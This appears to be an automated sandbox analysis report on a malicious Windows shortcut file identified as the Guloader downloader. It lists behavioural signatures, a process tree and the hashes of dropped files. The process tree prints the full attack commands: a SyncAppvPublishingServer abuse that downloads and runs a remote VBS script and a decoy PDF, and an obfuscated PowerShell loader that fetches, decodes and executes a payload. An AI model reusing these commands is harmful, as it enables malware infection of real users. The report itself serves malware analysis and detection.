Analysis

  • max time kernel
    147s
  • max time network
    143s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230220-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
  • submitted
    11-03-2023 03:35

General

  • Target

    Doc065754.lnk

  • Size

    2KB

  • MD5

    f4aa46ca2856c7f137ca9e95b255c001

  • SHA1

    a71f7cec83d329c3444dcc9cf53181689ac02227

  • SHA256

    86a3eea0abb10bdcac6a00b9bdf1d76a408fbdd27db8be389757e069a2855f11

  • SHA512

    e207a15a14acdfd40e6edbff9d96f2e8a460e954768da45d6d5de3a78fec04a5758261a92f3696a694fa7fba55faf0fbc1222d7276e3bc238723e3321556093a

Malware Config

Signatures

  • Guloader,Cloudeye

    A shellcode based downloader first seen in 2020.

  • Blocklisted process makes network request 2 IoCs
  • Checks QEMU agent file 2 TTPs 2 IoCs

    Checks presence of QEMU agent, possibly to detect virtualization.

  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Adds Run key to start application 2 TTPs 2 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Modifies registry class 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 26 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\Doc065754.lnk
    1⤵
    • Checks computer location settings
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:1524
    • C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "\\localhost\c$\Windows\System32\SyncAppvPublishingServer.vbs" n; Invoke-WebRequest http://0xC2.11808979/sara/Vejlensisk90.vbs -OutFile C:\Windows\Tasks\Tepoler.vbs; C:\Windows\Tasks\Tepoler.vbs; Invoke-WebRequest http://0xC2.11808979/sara/info.pdf -OutFile C:\Users\Public\info1.pdf; C:\Users\Public\info1.pdf
      2⤵
      • Checks computer location settings
      • Suspicious use of WriteProcessMemory
      PID:4524
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive -WindowStyle Hidden -ExecutionPolicy RemoteSigned -Command &{$env:psmodulepath = [IO.Directory]::GetCurrentDirectory(); import-module AppvClient; Sync-AppvPublishingServer n; Invoke-WebRequest http://0xC2.11808979/sara/Vejlensisk90.vbs -OutFile C:\Windows\Tasks\Tepoler.vbs; C:\Windows\Tasks\Tepoler.vbs; Invoke-WebRequest http://0xC2.11808979/sara/info.pdf -OutFile C:\Users\Public\info1.pdf; C:\Users\Public\info1.pdf}
        3⤵
        • Blocklisted process makes network request
        • Drops file in Windows directory
        • Modifies registry class
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:3924
        • C:\Windows\System32\WScript.exe
          "C:\Windows\System32\WScript.exe" "C:\Windows\Tasks\Tepoler.vbs"
          4⤵
          • Blocklisted process makes network request
          • Checks computer location settings
          • Suspicious use of WriteProcessMemory
          PID:4352
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "Function Foetureta9 ([String]$Eddikeb){For($Modemets=1; $Modemets -lt $Eddikeb.Length-1; $Modemets+=(1+1)){$mdeaftens=$mdeaftens+$Eddikeb.Substring($Modemets, 1)};$mdeaftens;}$cate=Foetureta9 ' hAt t p :U/P/A1B9 4N.B1F8 0 .b4 8R.A2K1H1 / z a rPaN/FDPeHdEeTp sHe uSd 5L2T. t o cH ';$mdeaftens01=Foetureta9 ' iOeTx ';$Sacr = Foetureta9 'T\Es ySsUwHo w 6 4S\PW iSn dSo wBsEP o w e rOSHhReKl lS\ vD1W.B0 \ p o wmeMr srhOe lAlF.me xSe ';.($mdeaftens01) (Foetureta9 'S$ RDa vGkBn o p 2G= $CeOn vS:FwriPnSdRi rT ') ;.($mdeaftens01) (Foetureta9 'C$GS aScRrp=D$ R a vAk nCoapR2A+ $ SpaKcTr ') ;.($mdeaftens01) (Foetureta9 'H$ Y aErDlA D= (A( g wsm iS LwIi nA3 2 _ pBrSoDc ePs s -DF PTrDo c eMsSsRI dG=S$N{AP I D }U) .FC oUm mCa nTdFLLiOnBeS) S- sUpSl i tC [Lc h aDr ]N3 4S ');.($mdeaftens01) (Foetureta9 ' $IF o rPsDbPnS1 3C3M G= A$MYGa r lu[ $ YTaAr lP.Scbo u n tG-C2 ] ');.($mdeaftens01) (Foetureta9 'H$MM o dAe lO= (RTAeHs t - PcaUtWh R$AS aRcNr )K e- A nEdA S( [DIDnbtAP tNr ]H:R: sFi z e - e q R8B) ') ;if ($Model) {.$Sacr $Forsbn133;} else {;$mdeaftens00=Foetureta9 'SS tGaDrSt -UB iOtDsITArBaEnBs f e r G- S oruSrsc eN S$ c a tFeU -DDSe sSt i n aDtRi oRnC Y$PR aWvdkUn o p 2F ';.($mdeaftens01) (Foetureta9 'S$TRKaAvIk nSo pF2L=N$ eRn vs:TaBp ppdOaKtIaJ ') ;.($mdeaftens01) (Foetureta9 'WIUmmpTo r tP-BMGoFdPuBl e UBRiBt s TSr aUnts fSeBrG ') ;$Ravknop2=$Ravknop2+'\Raao.pal';while (-not $Forhandle10) {.($mdeaftens01) (Foetureta9 'M$ F oPrPhba nLd l eI1F0N=D(RTJeOsFt -KP aBtJhh K$ERAa vhk nPo ps2T)H ') ;.($mdeaftens01) $mdeaftens00;.($mdeaftens01) (Foetureta9 ' SMt aSrAt -OS lCe eDpb 5 ');}.($mdeaftens01) (Foetureta9 ' $FFFoSe tUu r eGtMaf N=E AG ertS- CCoAnItGeRnBtR P$ R aMvTk nAo p 2 ');.($mdeaftens01) (Foetureta9 ' $ PJeFlUoSt oJn P= K[UScy s tUePmP. CJoAn vUe r t ]R: : FOr oTmvBFa s eM6 4DS tHr iFnWgL(s$CFJo e tDu r eSt a )R ');.($mdeaftens01) (Foetureta9 'P$ mCdEeTaTf taeRn s 2E =T [ASMyKs t e mK.PTReLx t .VERn c o d i nMgE] :C:uARSJC ILIH.CGDeftTS t r i nHg (N$SPCeSl o tSoEnS) ');.($mdeaftens01) (Foetureta9 'A$TN o nrcso =F$Um dIeBa fRtTeVnAsO2S.BsEu bPsCt rCifnGgS(S1Z8B8 2 6 4 ,T1M9c3B3 5B)F ');.($mdeaftens01) $Nonco;}"
            5⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:1076
            • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "Function Foetureta9 ([String]$Eddikeb){For($Modemets=1; $Modemets -lt $Eddikeb.Length-1; $Modemets+=(1+1)){$mdeaftens=$mdeaftens+$Eddikeb.Substring($Modemets, 1)};$mdeaftens;}$cate=Foetureta9 ' hAt t p :U/P/A1B9 4N.B1F8 0 .b4 8R.A2K1H1 / z a rPaN/FDPeHdEeTp sHe uSd 5L2T. t o cH ';$mdeaftens01=Foetureta9 ' iOeTx ';$Sacr = Foetureta9 'T\Es ySsUwHo w 6 4S\PW iSn dSo wBsEP o w e rOSHhReKl lS\ vD1W.B0 \ p o wmeMr srhOe lAlF.me xSe ';.($mdeaftens01) (Foetureta9 'S$ RDa vGkBn o p 2G= $CeOn vS:FwriPnSdRi rT ') ;.($mdeaftens01) (Foetureta9 'C$GS aScRrp=D$ R a vAk nCoapR2A+ $ SpaKcTr ') ;.($mdeaftens01) (Foetureta9 'H$ Y aErDlA D= (A( g wsm iS LwIi nA3 2 _ pBrSoDc ePs s -DF PTrDo c eMsSsRI dG=S$N{AP I D }U) .FC oUm mCa nTdFLLiOnBeS) S- sUpSl i tC [Lc h aDr ]N3 4S ');.($mdeaftens01) (Foetureta9 ' $IF o rPsDbPnS1 3C3M G= A$MYGa r lu[ $ YTaAr lP.Scbo u n tG-C2 ] ');.($mdeaftens01) (Foetureta9 'H$MM o dAe lO= (RTAeHs t - PcaUtWh R$AS aRcNr )K e- A nEdA S( [DIDnbtAP tNr ]H:R: sFi z e - e q R8B) ') ;if ($Model) {.$Sacr $Forsbn133;} else {;$mdeaftens00=Foetureta9 'SS tGaDrSt -UB iOtDsITArBaEnBs f e r G- S oruSrsc eN S$ c a tFeU -DDSe sSt i n aDtRi oRnC Y$PR aWvdkUn o p 2F ';.($mdeaftens01) (Foetureta9 'S$TRKaAvIk nSo pF2L=N$ eRn vs:TaBp ppdOaKtIaJ ') ;.($mdeaftens01) (Foetureta9 'WIUmmpTo r tP-BMGoFdPuBl e UBRiBt s TSr aUnts fSeBrG ') ;$Ravknop2=$Ravknop2+'\Raao.pal';while (-not $Forhandle10) {.($mdeaftens01) (Foetureta9 'M$ F oPrPhba nLd l eI1F0N=D(RTJeOsFt -KP aBtJhh K$ERAa vhk nPo ps2T)H ') ;.($mdeaftens01) $mdeaftens00;.($mdeaftens01) (Foetureta9 ' SMt aSrAt -OS lCe eDpb 5 ');}.($mdeaftens01) (Foetureta9 ' $FFFoSe tUu r eGtMaf N=E AG ertS- CCoAnItGeRnBtR P$ R aMvTk nAo p 2 ');.($mdeaftens01) (Foetureta9 ' $ PJeFlUoSt oJn P= K[UScy s tUePmP. CJoAn vUe r t ]R: : FOr oTmvBFa s eM6 4DS tHr iFnWgL(s$CFJo e tDu r eSt a )R ');.($mdeaftens01) (Foetureta9 'P$ mCdEeTaTf taeRn s 2E =T [ASMyKs t e mK.PTReLx t .VERn c o d i nMgE] :C:uARSJC ILIH.CGDeftTS t r i nHg (N$SPCeSl o tSoEnS) ');.($mdeaftens01) (Foetureta9 'A$TN o nrcso =F$Um dIeBa fRtTeVnAsO2S.BsEu bPsCt rCifnGgS(S1Z8B8 2 6 4 ,T1M9c3B3 5B)F ');.($mdeaftens01) $Nonco;}"
              6⤵
              • Checks QEMU agent file
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Suspicious use of SetThreadContext
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious behavior: MapViewOfSection
              • Suspicious use of AdjustPrivilegeToken
              PID:384
              • C:\Program Files (x86)\internet explorer\ieinstal.exe
                "C:\Program Files (x86)\internet explorer\ieinstal.exe"
                7⤵
                • Checks QEMU agent file
                • Adds Run key to start application
                • Suspicious use of NtCreateThreadExHideFromDebugger
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                • Suspicious use of SetWindowsHookEx
                PID:2444
        • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
          "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Public\info1.pdf"
          4⤵
          • Checks processor information in registry
          • Modifies Internet Explorer settings
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of SetWindowsHookEx
          • Suspicious use of WriteProcessMemory
          PID:4972
          • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
            "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:4436
            • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
              "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=D66A67A5DAE5B92DF42917DD0E9FBA7C --mojo-platform-channel-handle=1736 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
              6⤵
                PID:3244
              • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=13329A1430DC9510B5B06D2CB41556BE --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=13329A1430DC9510B5B06D2CB41556BE --renderer-client-id=2 --mojo-platform-channel-handle=1744 --allow-no-sandbox-job /prefetch:1
                6⤵
                  PID:2768
                • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                  "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=FA4D163C1D99AE24BF572CAE41B12B83 --mojo-platform-channel-handle=2292 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
                  6⤵
                    PID:1260
                  • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                    "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=7935409F9667B3A661D56EB775ADFA50 --mojo-platform-channel-handle=1968 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
                    6⤵
                      PID:3084
                    • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                      "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=BD96FFBD2770EBF582C8734039C77AEA --mojo-platform-channel-handle=1980 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
                      6⤵
                        PID:4900
            • C:\Windows\System32\CompPkgSrv.exe
              C:\Windows\System32\CompPkgSrv.exe -Embedding
              1⤵
                PID:2628

              Network

              MITRE ATT&CK Enterprise v6

              Replay Monitor

              Loading Replay Monitor...

              Downloads

              • C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

                Filesize

                36KB

                MD5

                b30d3becc8731792523d599d949e63f5

                SHA1

                19350257e42d7aee17fb3bf139a9d3adb330fad4

                SHA256

                b1b77e96279ead2b460de3de70e2ea4f5ad1b853598a4e27a5caf3f1a32cc4f3

                SHA512

                523f54895fb07f62b9a5f72c8b62e83d4d9506bda57b183818615f6eb7286e3b9c5a50409bc5c5164867c3ccdeae88aa395ecca6bc7e36d991552f857510792e

              • C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

                Filesize

                56KB

                MD5

                752a1f26b18748311b691c7d8fc20633

                SHA1

                c1f8e83eebc1cc1e9b88c773338eb09ff82ab862

                SHA256

                111dac2948e4cecb10b0d2e10d8afaa663d78d643826b592d6414a1fd77cc131

                SHA512

                a2f5f262faf2c3e9756da94b2c47787ce3a9391b5bd53581578aa9a764449e114836704d6dec4aadc097fed4c818831baa11affa1eb25be2bfad9349bb090fe5

              • C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

                Filesize

                64KB

                MD5

                d6ea9069821871f3e6814b183afa9b2b

                SHA1

                edd16a0b0085d7e2f2238a9a085215ebba2e5bee

                SHA256

                87a0715cf86edfd9148324be550bf3fe346cccdb9562e767bf9f4f353711c26c

                SHA512

                6b93e650cb851f98aebe2649762f489e298cc9df3e98ac367824aad51ae435ecf9eb135cad5d4ef5b468209e4e6d55ebbf3efc423fd1233b15bc8b1a4d5d9aa5

              • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                Filesize

                3KB

                MD5

                54eea9572b8a1295c4226dd63cadef78

                SHA1

                1572cc403c755aa7faeb0ee2e795d449e61d485f

                SHA256

                47b23fd79d8b2504103e2ffbd3866956a332f4c6d37625195ca0f5ab76a39ee3

                SHA512

                ca125313f150c27926efd0832f81964c3a6a72a42fa7a4bb9fb8579661d26b6b29ee621683b7be0c84371ce4b3791dcf9fd9da0836fb67c7dd331012dbd48809

              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                Filesize

                1KB

                MD5

                b3816ba18b06cb5984eed639e37d4512

                SHA1

                58bb6442fb2d98d8e7fa984b3324253e184cf488

                SHA256

                afd25ba7facf64b22ec5c87d409fd27c40f9648536fed4947b0dbf9f8c114ff5

                SHA512

                7bd27315fb26e62b7ce70211cb77043541fac0b3910ef53ee38725bf19595b37b7fd205c09e14116b6f1e3e0733db45e8b5561e4d91cba4f1fa1e138c9843098

              • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_b21um4j1.tuw.ps1

                Filesize

                60B

                MD5

                d17fe0a3f47be24a6453e9ef58c94641

                SHA1

                6ab83620379fc69f80c0242105ddffd7d98d5d9d

                SHA256

                96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                SHA512

                5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

              • C:\Users\Public\info1.pdf

                Filesize

                3.5MB

                MD5

                4c8c59e6ceb46ab5868966fba52a300c

                SHA1

                fb801fb5394e9ec9e2be1d38ad0ee63d25344418

                SHA256

                6e641de68bfd6ab98e297704ab27f784cde401eaaa2d3f7d8653553c60f977da

                SHA512

                b008f519506331de8a2da145db7a6043cf2ab87ed7edce6845cd045fe7cc5795e92e2992ad88af0b174d77ec49511430af939f401c1e40828bdf753137710005

              • C:\Windows\Tasks\Tepoler.vbs

                Filesize

                34KB

                MD5

                5794e47d892a3cab512697ca7dc223f4

                SHA1

                91f1ac9d1f3209bc5d1bc790319c3675d5a201ed

                SHA256

                ffe477577469c87c606e0cbd9d0da68446cd8d895e4f4ab0a083f0a05ac8ab20

                SHA512

                3699ec735f33e5b9c2c2d5b18ee75e15b736205adf65db8d30df0b56e7c5b0054f73d1eeb6f01e0e85aacbc5ea6cd004bd90c3f8c84b18db5cdf6ee3c2a1d228

              • memory/384-210-0x0000000006C30000-0x0000000006C4A000-memory.dmp

                Filesize

                104KB

              • memory/384-216-0x00000000076E0000-0x0000000007702000-memory.dmp

                Filesize

                136KB

              • memory/384-343-0x0000000008F40000-0x000000000EA1F000-memory.dmp

                Filesize

                90.9MB

              • memory/384-342-0x0000000008610000-0x0000000008611000-memory.dmp

                Filesize

                4KB

              • memory/384-340-0x000000007F360000-0x000000007F370000-memory.dmp

                Filesize

                64KB

              • memory/384-334-0x0000000005220000-0x0000000005230000-memory.dmp

                Filesize

                64KB

              • memory/384-249-0x0000000005220000-0x0000000005230000-memory.dmp

                Filesize

                64KB

              • memory/384-248-0x0000000005220000-0x0000000005230000-memory.dmp

                Filesize

                64KB

              • memory/384-241-0x0000000008630000-0x0000000008644000-memory.dmp

                Filesize

                80KB

              • memory/384-175-0x0000000002DE0000-0x0000000002E16000-memory.dmp

                Filesize

                216KB

              • memory/384-176-0x0000000005860000-0x0000000005E88000-memory.dmp

                Filesize

                6.2MB

              • memory/384-177-0x0000000005220000-0x0000000005230000-memory.dmp

                Filesize

                64KB

              • memory/384-178-0x0000000005220000-0x0000000005230000-memory.dmp

                Filesize

                64KB

              • memory/384-179-0x0000000005E90000-0x0000000005EB2000-memory.dmp

                Filesize

                136KB

              • memory/384-180-0x0000000006030000-0x0000000006096000-memory.dmp

                Filesize

                408KB

              • memory/384-181-0x00000000060A0000-0x0000000006106000-memory.dmp

                Filesize

                408KB

              • memory/384-191-0x0000000006610000-0x000000000662E000-memory.dmp

                Filesize

                120KB

              • memory/384-209-0x0000000007D60000-0x00000000083DA000-memory.dmp

                Filesize

                6.5MB

              • memory/384-240-0x000000007F360000-0x000000007F370000-memory.dmp

                Filesize

                64KB

              • memory/384-212-0x0000000005220000-0x0000000005230000-memory.dmp

                Filesize

                64KB

              • memory/384-213-0x0000000007780000-0x0000000007816000-memory.dmp

                Filesize

                600KB

              • memory/384-234-0x0000000007D30000-0x0000000007D3A000-memory.dmp

                Filesize

                40KB

              • memory/384-220-0x0000000008990000-0x0000000008F34000-memory.dmp

                Filesize

                5.6MB

              • memory/384-221-0x0000000007C90000-0x0000000007CC2000-memory.dmp

                Filesize

                200KB

              • memory/384-222-0x0000000064E00000-0x0000000064E4C000-memory.dmp

                Filesize

                304KB

              • memory/384-223-0x0000000065770000-0x0000000065AC4000-memory.dmp

                Filesize

                3.3MB

              • memory/384-233-0x0000000007C70000-0x0000000007C8E000-memory.dmp

                Filesize

                120KB

              • memory/1076-174-0x000001BB18640000-0x000001BB18650000-memory.dmp

                Filesize

                64KB

              • memory/1076-242-0x000001BB18640000-0x000001BB18650000-memory.dmp

                Filesize

                64KB

              • memory/1076-243-0x000001BB18640000-0x000001BB18650000-memory.dmp

                Filesize

                64KB

              • memory/1076-173-0x000001BB18640000-0x000001BB18650000-memory.dmp

                Filesize

                64KB

              • memory/1076-172-0x000001BB18640000-0x000001BB18650000-memory.dmp

                Filesize

                64KB

              • memory/2444-359-0x0000000001200000-0x0000000006CDF000-memory.dmp

                Filesize

                90.9MB

              • memory/2444-368-0x0000000001200000-0x0000000006CDF000-memory.dmp

                Filesize

                90.9MB

              • memory/2444-366-0x0000000001200000-0x0000000006CDF000-memory.dmp

                Filesize

                90.9MB

              • memory/3924-144-0x0000023FEFDF0000-0x0000023FEFE00000-memory.dmp

                Filesize

                64KB

              • memory/3924-138-0x0000023FD7770000-0x0000023FD7792000-memory.dmp

                Filesize

                136KB

              • memory/3924-146-0x00007FFEB3A80000-0x00007FFEB3B35000-memory.dmp

                Filesize

                724KB

              • memory/3924-147-0x0000023FEFDD0000-0x0000023FEFDEC000-memory.dmp

                Filesize

                112KB

              • memory/3924-148-0x0000023FF0FE0000-0x0000023FF100E000-memory.dmp

                Filesize

                184KB

              • memory/3924-159-0x0000023FF0880000-0x0000023FF0A9C000-memory.dmp

                Filesize

                2.1MB

              • memory/3924-149-0x0000023FEFDF0000-0x0000023FEFE00000-memory.dmp

                Filesize

                64KB

              • memory/3924-143-0x0000023FEFDF0000-0x0000023FEFE00000-memory.dmp

                Filesize

                64KB

              • memory/3924-145-0x0000023FEFDF0000-0x0000023FEFE00000-memory.dmp

                Filesize

                64KB